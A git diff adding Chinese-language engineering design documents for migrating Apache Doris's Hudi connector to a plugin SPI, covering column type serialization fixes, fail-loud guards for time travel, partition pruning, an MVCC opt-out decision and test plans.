偏差:[DV-005](../deviations-log.md)(依赖假设更正 + scan 侧 parity gap) +- 风险:R-001(image 兼容,批 E) +- 连接器:[connectors/hudi.md](../connectors/hudi.md) + +--- + +## 当前阻塞项 + +无。批 A 可立即启动(gate 关闭,零 live-path 风险)。批 E 待 hive/HMS migration 排期。 diff --git a/plan-doc/tasks/designs/P3-T02-column-types-design.md b/plan-doc/tasks/designs/P3-T02-column-types-design.md new file mode 100644 index 00000000000000..932b132bc6fbca --- /dev/null +++ b/plan-doc/tasks/designs/P3-T02-column-types-design.md @@ -0,0 +1,131 @@ +# P3-T02 设计 — `column_types` 双 bug 修复 + +> 批 A / scan 正确性 · behind 关闭的 gate(`SPI_READY_TYPES` 不含 hms/hudi)· 零 live-path 风险 +> 关联:[tasks/P3](../P3-hudi-migration.md) · [HANDOFF 关键认知 1b HIGH ②](../../HANDOFF.md) · [DV-005](../../deviations-log.md) +> 状态:设计完成(code-grounded,BE↔Java 契约两点对抗确认) + +--- + +## Problem + +MOR-with-logs 的 JNI split 在 SPI 路径下,传给 BE Hudi JNI scanner 的 `hudi_column_types`(以及与之配对的 `hudi_column_names`)**被破坏**,命中**任何含 decimal / 复杂类型(array/map/struct)列**的表会读出错列 / 类型,或 names↔types 长度错位。 + +两个独立 bug 叠加: + +- **(a) 类型系统错 + 丢精度**:`HudiScanPlanProvider.planScan`(`HudiScanPlanProvider.java:118-120`)用 `HudiTypeMapping.fromAvroSchema(...).getTypeName()` 生成 column_types。`fromAvroSchema` 产出的是 **Doris** `ConnectorType`(`DECIMALV3`/`DATETIMEV2`/`STRING`...),`.getTypeName()` 只取**裸类型名**,丢失 precision/scale/子类型。而 BE Hudi JNI scanner 期望的是 **Hive 类型串**(`decimal(10,2)`/`struct`/`timestamp`/`date`...)——是另一套类型系统。 +- **(b) 逗号 join→split 打碎类型串**:`HudiScanRange` 把 `columnNames`/`columnTypes`/`deltaLogs` 三个 `List` 用 `String.join(",")` 压成单串存进 `properties` map(`HudiScanRange.java:89/92/95`),再在 `populateRangeParams` 里 `split(",")` 还原(`HudiScanRange.java:194/199/204`)。Hive 类型串**本身含逗号**(`decimal(10,2)`、`struct`、`map`)→ 一个类型被打碎成多个 list 元素,column_types 长度膨胀、与 column_names 错位。 + +--- + +## Root Cause + +### BE ↔ Java JNI scanner 的精确契约(已对抗确认,两处独立代码) + +`THudiFileDesc.{delta_logs, column_names, column_types}` 是 thrift **`list`**(`gensrc/thrift/PlanNodes.thrift:396-398`)。**join 由 BE 做,不是 FE 做**: + +| 字段 | BE cpp join(`be/src/format/table/hudi_jni_reader.cpp`)| Java scanner split(`fe/be-java-extensions/hadoop-hudi-scanner/.../HadoopHudiJniScanner.java`)| +|---|---|---| +| `delta_file_paths` | `join(delta_logs, ",")` (:52) | `.split(",")` (:106) | +| `hudi_column_names` | `join(column_names, ",")` (:53) | `.split(",")` (:212) | +| `hudi_column_types` | `join(column_types, **"#"**)` (:54) | `.split(**"#"**)` (:113) | + +**关键**:column_types 用 `#` 分隔,正是**因为**类型串里含逗号(`decimal(10,2)`/`struct<...>`);names 是标识符(无逗号)用 `,` 安全。所以 FE 的正确做法是:**把每个列类型作为一个完整 Hive 类型串、整体作为 list 的一个元素塞进 `THudiFileDesc.column_types`,绝不在 FE 端 join/split**。BE join `#`、Java split `#`,类型串里的逗号天然保留。 + +### legacy 参照(确认设计方向) + +- legacy `HudiScanNode.java:299-301` 直接 `fileDesc.setDeltaLogs(...)/setColumnNames(...)/setColumnTypes(...)` 设 thrift list —— **不 join**。 +- legacy column_types 来源:`HMSExternalTable.java:752` `colTypes.add(HudiUtils.convertAvroToHiveType(hudiAvroField.schema()))` → 完整 Hive 类型串。`HudiUtils.convertAvroToHiveType`(`HudiUtils.java:68-135`)是 canonical Avro→Hive-type-string 转换器。 + +### 当前 SPI bug 的连锁后果 + +`columnTypes = [..., "decimal(10,2)", "struct"]` +→ 构造器 `String.join(",")` → `"...,decimal(10,2),struct"` +→ `populateRangeParams` `split(",")` → `[..., "decimal(10", "2)", "struct"]`(元素数膨胀 + 串被打碎) +→ BE `join("#")` → `...#decimal(10#2)#struct` → Java `split("#")` 得到无意义的类型片段 → JNI reader 解析失败 / 错列。 +叠加 bug (a):即便不打碎,`getTypeName()` 也只给 `DECIMALV3`(无 `(10,2)`)/`STRUCT`(无子字段)——BE 无法用。 + +--- + +## Design + +三处改动,全部在 `fe-connector-hudi` 模块内(**不动 fe-core,不动 BE,不动 thrift**),gate 保持关闭。 + +### 改动 1 — `HudiTypeMapping.java`:新增 Avro→Hive 类型串方法 + +新增 `public static String toHiveTypeString(Schema schema)`,**逐行 mirror** legacy `HudiUtils.convertAvroToHiveType`(fe-core,import gate 禁止直接复用,故在连接器模块内复刻)。语义完全对齐,包括: +- `decimal(p,s)`、`array<...>`、`struct`、`map`、`timestamp`/`date`、primitives; +- UNION 单一非空类型递归 unwrap; +- 不支持类型(TimeMillis/TimeMicros/多类型 union/空 record)**抛 `IllegalArgumentException`**(与 legacy 一致,fail-loud)。 + +保留现有 `fromAvroSchema`(Avro→Doris `ConnectorType`)**不动**——它服务 schema 上报(`HudiConnectorMetadata.java:240`),是正确的、另一条路径。 + +### 改动 2 — `HudiScanPlanProvider.java`:用 Hive 类型串生成 column_types + +`planScan` 中 column_types 生成(:118-120): +```java +// before +columnTypes = avroSchema.getFields().stream() + .map(f -> HudiTypeMapping.fromAvroSchema(unwrapNullable(f.schema())).getTypeName()) + .collect(Collectors.toList()); +// after +columnTypes = avroSchema.getFields().stream() + .map(f -> HudiTypeMapping.toHiveTypeString(f.schema())) + .collect(Collectors.toList()); +``` +(`toHiveTypeString` 自己处理 union unwrap,直接传 `f.schema()`,对齐 legacy `convertAvroToHiveType(field.schema())`。)若此改动使私有 `unwrapNullable`(:350-359)变为未引用,则一并删除。 + +### 改动 3 — `HudiScanRange.java`:三个 list 字段端到端 typed,弃逗号 join/split + +- 新增三个 `List` 字段:`deltaLogs`、`columnNames`、`columnTypes`(不可变副本)。 +- 构造器:**移除** `props.put("hudi.delta_logs"/"hudi.column_names"/"hudi.column_types", String.join(",", ...))`(:88-96 三处),改为赋值字段。标量 JNI 字段(instant_time/serde/input_format/base_path/data_file_path/data_file_length)**保持原样存 props map**(无逗号问题,最小改动)。 +- `populateRangeParams`: + - JNI 降级判定的 delta-logs 空检查(:161-162)改用 `deltaLogs` 字段(`deltaLogs == null || deltaLogs.isEmpty()`)。 + - 直接 `fileDesc.setDeltaLogs(deltaLogs)/setColumnNames(columnNames)/setColumnTypes(columnTypes)`(保留 null/empty 守卫),**不再 split**。 + +> `getProperties()` 仅被 `HudiScanRange.populateRangeParams` 自身消费(`PluginDrivenScanNode.java:392` 调 `populateRangeParams`,且 `HudiScanRange` override 了该方法、不走 `ConnectorScanRange` 默认 generic 路径)——故三个 list key 从 map 移除对外部零影响。 + +--- + +## Implementation Plan + +1. `HudiTypeMapping.java`:加 `toHiveTypeString(Schema)` + 递归 helper(mirror legacy)。 +2. `HudiScanPlanProvider.java`:改 :118-120;若 `unwrapNullable` 变 dead 则删。 +3. `HudiScanRange.java`:加 3 字段、改构造器、改 `populateRangeParams`。 +4. 新增单测(见下)。 +5. 构建守门:`mvn -pl fe-connector/fe-connector-hudi -am test -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`(cwd=fe/);checkstyle 0;import-gate 通过。 + +--- + +## Risk Analysis + +- **回归面**:gate 关闭,hudi 查询仍走 legacy 路径;SPI `HudiScanRange`/`HudiScanPlanProvider` **零 live caller**(trino-connector 之外的 SPI 表才会触达,hudi 未翻闸)。改动纯属硬化 dormant 代码,**零 live-path 风险**。 +- **契约风险**:BE↔Java 的 `#`/`,` 分隔已两点确认;不改 BE/thrift,契约不变。 +- **parity 残留(不在 T02 范围,登记)**: + - column_names/types 的**列集合与顺序**是否与 legacy(meta 列 `_hoodie_*`、partition 列)完全一致 → 由 **T07 parity 测试**校验。 + - schema 解析失败时 `planScan` try/catch 吞成空 list(:121-126)的 fail-loud 问题 → **T04** 处理,本 task 不动控制流。 + - `toHiveTypeString` 对不支持类型抛异常,会被上述 try/catch 吞 → 同属 T04 范畴。 +- **simplicity(CLAUDE.md R2/R3)**:仅 3 文件、新增一个 mirror 方法 + 字段化三个 list;标量保持原样,最小 diff。 + +--- + +## Test Plan + +### Unit Tests(本 task 交付;建立 fe-connector-hudi 首个测试) + +`HudiTypeMappingTest`(验证 Avro→Hive 串编码意图,Rule 9): +- `decimal` logical type → `"decimal(10,2)"`(**精度/scale 不丢** —— 直击 bug a)。 +- record → `"struct"`(**含逗号的复杂类型** —— 串里必须保留逗号)。 +- `array`、`map`、嵌套 `array>`。 +- primitives:int/bigint/boolean/float/double/string/date/timestamp。 +- nullable union(`["null", T]`)→ unwrap 为 T。 +- 不支持类型(TimeMillis)→ 抛 `IllegalArgumentException`(fail-loud parity)。 + +`HudiScanRangeTest`(验证 typed-list 端到端不被打碎,Rule 9 —— 直击 bug b): +- 构造 range:`columnNames=["x","y","z"]`、`columnTypes=["int","decimal(10,2)","struct"]`、`deltaLogs=["s3://.../.log.1","s3://.../.log.2"]`、含 delta logs(→ JNI)。 +- 调 `populateRangeParams`,断言 `THudiFileDesc.getColumnTypes()` **恰为 3 个元素且逐元素未变**(不是被逗号打碎成 5 个),`getColumnNames()` 3 元素,`getDeltaLogs()` 2 元素,names↔types **长度一致**。 +- 断言 `decimal(10,2)`、`struct` 作为**单个 list 元素**完整保留(编码"类型串里的逗号必须存活到 BE,否则 JNI scanner split('#') 读错类型"这一 WHY)。 +- 降级用例:无 delta logs 的 `.parquet` data file → format 降为 `FORMAT_PARQUET`、不设 JNI 列字段(验证 :160-176 降级逻辑用 field 后仍正确)。 + +### E2E Tests + +**不适用 / 推迟批 E**:gate 关闭,hudi 查询不走 SPI 路径,无法在 regression-test 中端到端触达本代码(需 batch E 翻闸 + Hudi 集群)。按 [tasks/P3 §策略](../P3-hudi-migration.md) 批 A–C 验证为「单测 + 设计级」,端到端随批 E cutover 做。**显式登记,不静默跳过(CLAUDE.md R12)**。 diff --git a/plan-doc/tasks/designs/P3-T04-fail-loud-design.md b/plan-doc/tasks/designs/P3-T04-fail-loud-design.md new file mode 100644 index 00000000000000..5cfaa27be83fba --- /dev/null +++ b/plan-doc/tasks/designs/P3-T04-fail-loud-design.md @@ -0,0 +1,69 @@ +# P3-T04 设计 — time-travel + 增量读 fail-loud 守卫 + +> 批 A / scan 正确性 · behind 关闭的 gate · 零 live-path 风险(SPI hudi 分支 dormant,gate 关时不可达) +> 关联:[tasks/P3](../P3-hudi-migration.md) · [HANDOFF 1b HIGH ③④](../../HANDOFF.md) · [DV-005](../../deviations-log.md) +> 状态:设计完成(code-grounded) + +--- + +## Problem + +SPI hudi 路径对两类查询**静默给错结果**: + +- **time-travel**(`FOR TIME AS OF` / `FOR VERSION AS OF`):`PhysicalPlanTranslator.visitPhysicalHudiScan` SPI 分支(`PhysicalPlanTranslator.java:835`)把 snapshot 经 `setQueryTableSnapshot` 设到 node,但 `HudiScanPlanProvider.planScan`(`HudiScanPlanProvider.java:103`)**永远用 `timeline.lastInstant()`**、忽略 snapshot → **静默返最新**。 +- **增量读**(incremental relation):SPI 分支(`:828-838`)**根本不传** `hudiScan.getIncrementalRelation()`(仅 legacy 分支 `:848` 传);SPI 无任何增量表示 → **静默全量扫描**。 + +二者都是**正确性 bug(静默错结果)**,不是性能问题。 + +## Root Cause + +- snapshot 透传链路未接:node 拿到 snapshot 但 provider 不消费。 +- 增量读在 SPI 层无模型(`IncrementalRelation` 是 fe-core 概念,4 个 `*IncrementalRelation` 类仍在 fe-core;P1-T04 已知 gap)。 +- 完整实现(snapshot 透传到 provider + 增量 SPI 表示 + MVCC)属**批 E**(与 hive/HMS migration、模型落地一并),见 T06/批 E。 + +## Design + +**仅做 fail-loud(task 范围)**:在 `visitPhysicalHudiScan` 的 SPI 分支**顶部**显式报错,绝不静默。这是**唯一**同时可见 snapshot + incrementalRelation 的位置(SPI surface 拿不到 incrementalRelation),故守卫只能落在该 dormant 分支(gate 关时不可达,零 live 风险)。 + +```java +if (table instanceof PluginDrivenExternalTable) { + // Fail loud: SPI hudi 路径尚不支持 time travel / 增量读(provider 永远读最新, + // 增量 relation 无 SPI 表示)。静默返最新/全扫会给错结果。完整支持推迟批 E。 + if (hudiScan.getIncrementalRelation().isPresent()) { + throw new AnalysisException("Hudi incremental read is not yet supported via the " + + "catalog SPI; it is deferred to the Hudi connector migration."); + } + if (hudiScan.getTableSnapshot().isPresent()) { + throw new AnalysisException("Hudi time travel (FOR TIME/VERSION AS OF) is not yet " + + "supported via the catalog SPI; it is deferred to the Hudi connector migration."); + } + ... // 原 node 创建逻辑;删去已被守卫覆盖为 dead 的 setQueryTableSnapshot 行 +} +``` + +- 守卫只在**真有** time-travel/增量时触发;普通快照查询 `Optional.empty()` → 正常通过,零影响。 +- `AnalysisException`(`org.apache.doris.nereids.exceptions.AnalysisException`,unchecked,已 import `:76`)= nereids 用户向错误的惯用类型。 +- 守卫后 `hudiScan.getTableSnapshot()` 必为空 → 原 `:835` 的 `ifPresent(setQueryTableSnapshot)` 成 dead,删除(surgical)。更新 `:825-827` 注释为新行为 + 批 E 指向。 + +## Implementation Plan + +1. `PhysicalPlanTranslator.visitPhysicalHudiScan` SPI 分支加两守卫 + 删 dead `setQueryTableSnapshot` 行 + 更新注释。 +2. 守门:`mvn -pl fe-core -am compile`(fe-core 大,rebase 后失败先 clean fe-core,关键认知 2);checkstyle 0。 + +## Risk Analysis + +- **零 live 风险**:SPI 分支仅当 `table instanceof PluginDrivenExternalTable`(即 hudi 走 SPI)才进;gate 关(`SPI_READY_TYPES` 不含 hms/hudi)→ hudi 永远是 `HMSExternalTable`,**该分支运行期不可达**。改动是硬化 dormant 代码。 +- **不碰** SPI_READY_TYPES / legacy / 其他连接器 `instanceof` 分支(HANDOFF 关键认知 3)。 +- **行为改进**:从「静默错结果」→「显式报错」。对 legacy 路径(line 844+)零影响。 + +## Test Plan + +### Unit Tests + +**不适用(显式登记,不静默——CLAUDE.md R12)**:守卫在 fe-core nereids translator 的 **dormant 分支**,gate 关时**运行期不可达**;单测需构造 `PhysicalHudiScan` + `PlanTranslatorContext` + `PluginDrivenExternalTable`(重 nereids 脚手架),且无法真正 exercise(分支不可达)。抽 boolean-helper 仅为测一个近乎恒真的 2-行守卫 = 为单用代码加抽象(违 R2)、测试近同义反复(违 R9)。 + +**验证推迟批 E**(与 T03/DV-006、T11 一致;precedent DV-003):批 E 翻闸后在 regression-test 加 `FOR TIME AS OF ` / 增量查询 → **断言报错**(而非静默最新/全扫)。本 task 的正确性由 code review + 编译保证;运行期断言入批 E。 + +### E2E Tests + +同上:推迟批 E(gate 关,端到端不可触达)。 diff --git a/plan-doc/tasks/designs/P3-T05-partition-pruning-design.md b/plan-doc/tasks/designs/P3-T05-partition-pruning-design.md new file mode 100644 index 00000000000000..2ec177844350e5 --- /dev/null +++ b/plan-doc/tasks/designs/P3-T05-partition-pruning-design.md @@ -0,0 +1,132 @@ +# P3-T05 设计 — `applyFilter` 真实 EQ/IN 分区裁剪 + +> 批 B / metadata 补全 · behind 关闭的 gate(`SPI_READY_TYPES` 不含 hms/hudi)· 零 live-path 风险(SPI hudi 分支 dormant,零 live caller) +> 关联:[tasks/P3](../P3-hudi-migration.md) · [HANDOFF 未完成 #1](../../HANDOFF.md) · [DV-005](../../deviations-log.md) · [DV-007](../../deviations-log.md)(批 B scope 校正) +> 对标参照:`HiveConnectorMetadata.applyFilter`(`fe-connector-hive`,:193-234 + 7 个 helper) +> 状态:设计完成(code-grounded,5-reader recon workflow + 主线核读 Hive/Hudi 全文) + +--- + +## Problem + +SPI Hudi 路径**不做分区裁剪**,且附带一个**静默的分区来源切换** bug。 + +`HudiConnectorMetadata.applyFilter`(`HudiConnectorMetadata.java:144-167`)当前对**任何**带 partition key 的表: + +1. **完全忽略谓词**:直接 `hmsClient.listPartitionNames(db, table, -1)` 拉**全部**分区名,不解析 `constraint.getExpression()`,不抽取 EQ/IN,不裁剪。 +2. **无条件**把全量列表塞进 `prunedPartitionPaths`(`:162-164`)。 + +两个后果: + +- **(perf/正确性) 无分区裁剪**:`year='2024' AND month='01'` 仍扫全部分区 → 性能塌方 + 无谓 HMS/文件系统压力。 +- **(隐蔽) 分区来源静默切换**:`prunedPartitionPaths` 一旦非 null,`HudiScanPlanProvider.resolvePartitions`(`:287-289`)就**短路**、直接用它,**绕过** `:307` 的 `HoodieTableMetadata.getAllPartitionPaths()`(Hudi 元数据表,Hudi 的权威分区来源)。即:**只要查询带任意 WHERE(触发 applyFilter),分区来源就从 Hudi-metadata 偷偷换成 HMS**;无 WHERE 时又回到 Hudi-metadata。两个来源对已同步表通常一致,但这是**未声明的行为分叉**,且把"裁剪入口"和"来源选择"耦合在了一起。 + +**对标**:`HiveConnectorMetadata.applyFilter`(`:193-234`)做真实 EQ/IN 裁剪,且**仅在裁剪真正生效时**才回传修改后的 handle,其余情况 `Optional.empty()`(handle 不变,下游用默认 listing)。Hudi 缺这套逻辑。 + +--- + +## Root Cause + +Hudi 的 `applyFilter` 是个**占位实现**:从未移植 Hive 的「抽取分区谓词 → 列候选 → 匹配 → 缩减集」链路,也没有 Hive 的「无效裁剪即 `Optional.empty()`」短路守卫,于是退化成"无条件设全量"。 + +> `ConnectorFilterConstraint.getColumnDomains()` 在 fe-core 侧由 `PluginDrivenScanNode.buildFilterConstraint` 传入**空 map**(`Collections.emptyMap()`),唯一可用的谓词表示是 `getExpression()`(完整表达式树)——与 Hive 一致。故裁剪必须解析 `getExpression()`。 + +--- + +## Design + +把 `HudiConnectorMetadata.applyFilter` **重写为忠实镜像 `HiveConnectorMetadata.applyFilter`**,但**保留 Hudi 的 `List prunedPartitionPaths` 表示**(不改用 Hive 的 `List`)——因为 `HudiScanPlanProvider.resolvePartitions` 消费的是**相对分区路径串**(喂给 Hudi `HoodieTableFileSystemView`,:208/:237),不是 HMS 分区元数据。HMS 分区**名**(`year=2024/month=01`,Hive 约定)即 Hudi 相对分区**路径**,二者同形,无需转换(现有 `parsePartitionValues` :317-332 已按 `/`+`=` 解析,证明同形假设)。 + +全部改动在 `fe-connector-hudi` 模块内(**不动 fe-core、不动 BE、不动 thrift、不动 Hive**),gate 保持关闭。 + +### 改动 1 — `HudiConnectorMetadata.applyFilter` 重写(mirror Hive 7 步) + +```java +HudiTableHandle hudiHandle = (HudiTableHandle) handle; +List partKeyNames = hudiHandle.getPartitionKeyNames(); +if (partKeyNames == null || partKeyNames.isEmpty()) { + return Optional.empty(); // ① 无分区列 → 不裁剪 +} +Map> partitionPredicates = extractPartitionPredicates( + constraint.getExpression(), partKeyNames); +if (partitionPredicates.isEmpty()) { + return Optional.empty(); // ② 无分区谓词 → handle 不变, +} // resolvePartitions 回落 Hudi-metadata listing(修复来源切换 bug) +List allPartNames = hmsClient.listPartitionNames( + hudiHandle.getDbName(), hudiHandle.getTableName(), -1); // ③ 列候选(保留现有 -1=unlimited,见下) +if (allPartNames == null || allPartNames.isEmpty()) { + return Optional.empty(); // 无分区可裁 +} +List matchedPartNames = prunePartitionNames( + allPartNames, partKeyNames, partitionPredicates); // ④ 按谓词匹配 +if (matchedPartNames.size() == allPartNames.size()) { + return Optional.empty(); // ⑤ 裁剪无效果 → 不回传 +} +HudiTableHandle updatedHandle = hudiHandle.toBuilder() + .prunedPartitionPaths(matchedPartNames) // ⑥ 仅缩减集(可为空=裁光) + .build(); +return Optional.of(new FilterApplicationResult<>( + updatedHandle, constraint.getExpression(), false)); // ⑦ remaining=全表达式(BE 复评,与 Hive 同) +``` + +**与 Hive 的两处有意差异(surgical,登记)**: + +- **③ HMS listPartitionNames 上限**:Hive 用 `100000`(硬上限,超出静默丢分区 → 潜在漏裁/错结果);Hudi **保留现状 `-1`(unlimited)**——**严格更安全**(不静默截断),且是 Hudi 占位实现的既有取值,不引入新行为。**不跟 Hive 的 100000**。 +- **分区表示**:Hive `List`(含 location/format);Hudi `List`(路径串)——Hudi 下游不需要 HMS 元数据(Hudi 自己从 FileSystemView 解析文件),保持现状字段,最小 diff。 + +### 改动 2 — 移植 7 个 private helper(duplicate from Hive) + +逐行复刻 `HiveConnectorMetadata` 的:`extractPartitionPredicates`、`extractPredicatesRecursive`、`extractColumnName`、`extractLiteralValue`、`prunePartitionNames`、`parsePartitionName`、`matchesPredicates`。语义完全一致: + +- 递归下降识别 `ConnectorAnd`(遍历 conjuncts)/ `ConnectorComparison`(仅 `Operator.EQ`)/ `ConnectorIn`(非 negated);列名经 `ConnectorColumnRef`、字面值经 `ConnectorLiteral`(`String.valueOf`)。 +- `parsePartitionName` 按 `/` 再 `=` 解析;`matchesPredicates` 要求每个分区谓词列在分区值中命中 allowed 集合。 +- 只对 **partition key 集合内**的列累积谓词(非分区列谓词被忽略 → 由 BE 复评,正确)。 + +**为何 duplicate 而非共享**:`fe-connector-hudi` 仅依赖 `fe-connector-hms`,**不依赖 `fe-connector-hive`**(pom 确认);连接器模块互相 import 对方 metadata 类是错误分层;import-gate 禁连接器 import fe-core。抽到 `fe-connector-hms` 共享需**改 Hive**(移其 private 副本)= 触碰其它连接器工作码(本场只动 hudi,HANDOFF 关键认知 5)。故复刻,**登记 Hive/Hudi 重复**,待 P7 hive migration 时一并 consolidate(届时两模块同改)。与 T02 复刻 `toHiveTypeString`(而非跨模块共享)一脉相承。 + +### 新增 import + +`ConnectorAnd`/`ConnectorComparison`/`ConnectorExpression`/`ConnectorIn`/`ConnectorLiteral`(`connector.api.pushdown`)、`java.util.HashMap`、`java.util.Set`。`FilterApplicationResult`/`ConnectorFilterConstraint` 已 import。 + +--- + +## Implementation Plan + +1. `HudiConnectorMetadata.java`:重写 `applyFilter`(:144-167)为 7 步;新增 7 个 helper;补 import。 +2. 新增 `HudiPartitionPruningTest`(见 Test Plan):手写 `HmsClient` 测试替身(接口 8 方法,仅实现 `listPartitionNames`,余抛 `UnsupportedOperationException`)。 +3. 守门:`mvn -pl fe-connector/fe-connector-hudi -am test -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`(cwd=`fe/`);checkstyle 0(**禁 static import**,用 `Assertions.assertX`);import-gate 通过。 + +--- + +## Risk Analysis + +- **零 live 风险**:gate 关闭,hudi 查询走 legacy `HudiScanNode`;SPI `HudiConnectorMetadata.applyFilter` **零 live caller**(仅 SPI 表触达,hudi 未翻闸)。改动纯硬化 dormant 代码。 +- **行为改进**:(a) 真实 EQ/IN 裁剪(性能);(b) 修复"分区来源静默切换"——无分区谓词时回 `Optional.empty()`,`resolvePartitions` 回落 Hudi-metadata listing,与无 WHERE 路径一致(消除分叉)。 +- **正确性边界**: + - 只裁剪 **EQ/IN over partition columns**;范围谓词(`>`/`<`/`BETWEEN`)、非分区列谓词**不裁剪**(保守),`remaining=全表达式` 交 BE 复评 → **不会漏行**(与 Hive 同语义)。 + - `matched` 为空(谓词命中 0 分区)→ `prunedPartitionPaths=[]` → 扫 0 分区(正确)。 + - 分区名/路径同形假设:现有 `parsePartitionValues` 已依赖,T05 不新增假设。 +- **不碰** `SPI_READY_TYPES` / legacy / 其它连接器(含 Hive)/ thrift(HANDOFF 关键认知 3+5)。 +- **simplicity(R2/R3)**:单文件 + 镜像 Hive 既证实现,最小 diff;保留 `List` 字段与 `-1` 上限(不引入新行为)。 + +--- + +## Test Plan + +### Unit Tests(本 task 交付;模块第三个测试类) + +`HudiPartitionPruningTest`(**测意图 / Rule 9**:编码「分区裁剪必须正确缩减集合、且绝不在非分区列或范围谓词上误裁」这一 WHY)。手写 `FakeHmsClient implements HmsClient`,`listPartitionNames` 返固定列表如 `["year=2023/month=12","year=2024/month=01","year=2024/month=02"]`,余方法抛 `UnsupportedOperationException`。构造真实 `ConnectorExpression` 树(`ConnectorComparison(EQ,…)` / `ConnectorIn` / `ConnectorAnd` / `ConnectorColumnRef` / `ConnectorLiteral`): + +- **EQ on partition col**:`year='2024'` → handle 含 2 分区(`year=2024/*`),断言**恰为**那 2 个、顺序保留。 +- **IN on partition col**:`month IN ('01','12')` → 跨 year 命中 `…/month=01` + `…/month=12`。 +- **AND(分区谓词 + 非分区谓词)**:`year='2024' AND price>100` → 仅按 `year` 裁(2 分区),`price>100` 被忽略(非分区列)→ 断言不误裁、不抛。 +- **非分区谓词 only**:`price>100` → `Optional.empty()`(**不裁剪、handle 不变**——直击"来源切换"修复)。 +- **谓词命中全部分区**:`year IN ('2023','2024')`(覆盖全集)→ `Optional.empty()`(裁剪无效果,不回传)。 +- **谓词命中 0 分区**:`year='1999'` → handle 含**空** `prunedPartitionPaths`(扫 0 分区,非 empty-optional)。 +- **无分区列表**:`partKeyNames` 空 → `Optional.empty()`(unpartitioned 表,applyFilter 不介入)。 + +每用例断言 `result.isPresent()` 与(present 时)`((HudiTableHandle)result.getHandle()).getPrunedPartitionPaths()` 的**精确集合**——断言旧占位码(设全量)会失败的行为。 + +### E2E Tests + +**不适用 / 推迟批 E**(与 T02/T04、`tasks/P3 §策略` 一致;precedent DV-003):gate 关闭,hudi 查询不走 SPI,无法在 regression-test 端到端触达。批 E 翻闸后加 regression:带分区谓词查询 → 断言**仅扫匹配分区**(explain/profile 校 partition 数)。**显式登记,不静默跳过(R12)**。 diff --git a/plan-doc/tasks/designs/P3-T06-mvcc-design.md b/plan-doc/tasks/designs/P3-T06-mvcc-design.md new file mode 100644 index 00000000000000..25f237fb4ebf66 --- /dev/null +++ b/plan-doc/tasks/designs/P3-T06-mvcc-design.md @@ -0,0 +1,39 @@ +# P3-T06 设计 — MVCC / snapshot SPI(保持 default opt-out,无代码) + +> 批 B / metadata 补全 · behind 关闭的 gate · 零 live-path 风险 +> 关联:[tasks/P3](../P3-hudi-migration.md) · [HANDOFF 未完成 #2](../../HANDOFF.md) · [DV-007](../../deviations-log.md)(批 B scope 校正)· [P3-T04 设计](./P3-T04-fail-loud-design.md) +> 状态:决策完成(code-grounded,用户签字 2026-06-05「Keep defaults + document」) + +--- + +## Problem + +`HudiConnectorMetadata` 未 override SPI 的三个 MVCC/snapshot 方法(`ConnectorMetadata.java:60-77`): +`beginQuerySnapshot` / `getSnapshotAt(timestampMillis)` / `getSnapshotById(snapshotId)`,均默认返 `Optional.empty()`。 + +HANDOFF 原提示 T06「**大概率显式 unsupported(与 T04 fail-loud 一致)**」——暗示**新增抛异常的 override**。 + +## 决策:**不 override,保持 SPI default(`Optional.empty()` = opt-out)+ 文档化**(无代码改动) + +code-grounded recon(5-reader workflow,mvcc-t06 reader)证明「新增抛异常 override」是**错的**: + +1. **SPI 约定 = default opt-out**:三方法 default 即 `Optional.empty()`,语义是「连接器**不支持** MVCC」。`FakeConnectorPluginTest`(fe-core)有显式断言「all three mvcc defaults return Optional.empty() — connector opts out of MVCC」。 +2. **无任何连接器 override**:`Iceberg` / `Paimon`(均 MVCC-capable 表格式)/ `Hive` / `Trino` **全部依赖 default**,无一 override。Hudi 若新增抛异常 override = **唯一打破 opt-out 约定**的连接器。 +3. **无 production caller**:全仓 `beginQuerySnapshot`/`getSnapshotAt`/`getSnapshotById` 仅出现在 SPI 接口、`ConnectorMvccSnapshot` 类型、`ConnectorMvccSnapshotAdapter`(fe-core,仅测试用)——**fe-core 查询路径从不调用**。抛异常的 override = **不可达死代码**。 +4. **T04 已在唯一可触发点 fail-loud**:Hudi 唯一可能请求 snapshot 的位置是 time-travel(`FOR TIME/VERSION AS OF`),`PhysicalPlanTranslator.visitPhysicalHudiScan` SPI 分支(T04,`feceabb`)**已抛 `AnalysisException`**。即便批 E 接通 MVCC 调用链,请求也在到达 metadata 前被 T04 拦截。重复在 metadata 层抛 = 冗余。 + +**结论**:正确的「unsupported」表达 = **保持 default `Optional.empty()`(与全体连接器一致)+ T04 的 translator 守卫**。T06 是**文档化决策**,非代码任务。完整 MVCC(`HudiMvccSnapshot` 语义、snapshot 透传、增量时序)入**批 E**(与 T03/T04 完整实现、T09–T11、hive/HMS migration 一并),见 [DV-007](../../deviations-log.md)。 + +## Why no code + +- 新增 override 违反 SPI opt-out 约定(R11 conformance)、是不可达死代码(R2 nothing speculative)、与全体连接器分叉(R7 surface conflicts—此处选更一致的一方)。 +- T04 已提供唯一可触发路径的 fail-loud;不重复(R3 surgical)。 + +## Risk Analysis + +- **零改动 → 零回归 / 零 live 风险**。 +- 行为正确性:gate 关时 MVCC 方法不可达;批 E 翻闸后,time-travel 被 T04 拦截(fail-loud),非 time-travel 查询不请求 snapshot → `Optional.empty()` 的 opt-out 语义正确(连接器不参与 MVCC,走默认 latest 快照语义由 provider 的 `timeline.lastInstant()` 承接,与当前一致)。 + +## Test Plan + +**不适用(无代码)**。SPI default opt-out 行为已由 fe-core `FakeConnectorPluginTest`(T08 三方法返 empty)覆盖。批 E 接通 MVCC 调用链 + 实现 `HudiMvccSnapshot` 后,于 regression 验证 time-travel 语义(与 T04 的批 E regression 同套:`FOR TIME AS OF` 当前 fail-loud,批 E 后返正确快照)。**显式登记,不静默(R12)**。 diff --git a/plan-doc/tasks/designs/P3-T07-test-baseline-design.md b/plan-doc/tasks/designs/P3-T07-test-baseline-design.md new file mode 100644 index 00000000000000..f566f94802c35e --- /dev/null +++ b/plan-doc/tasks/designs/P3-T07-test-baseline-design.md @@ -0,0 +1,116 @@ +# P3-T07 设计 — 三模块测试基线 + COW/MOR schema parity(golden-value) + +> 关联:[tasks/P3-hudi-migration.md](../P3-hudi-migration.md)(批 C / T07)、[HANDOFF 关键认知 2/3](../../HANDOFF.md)。 +> recon:5-agent code-grounded workflow(`p3-t07-recon`,2026-06-05),结论见下。 +> 用户签字(AskUserQuestion,2026-06-05):① **casing 当场修**;② baseline **focused intent-driven set**。 + +--- + +## Problem + +批 C 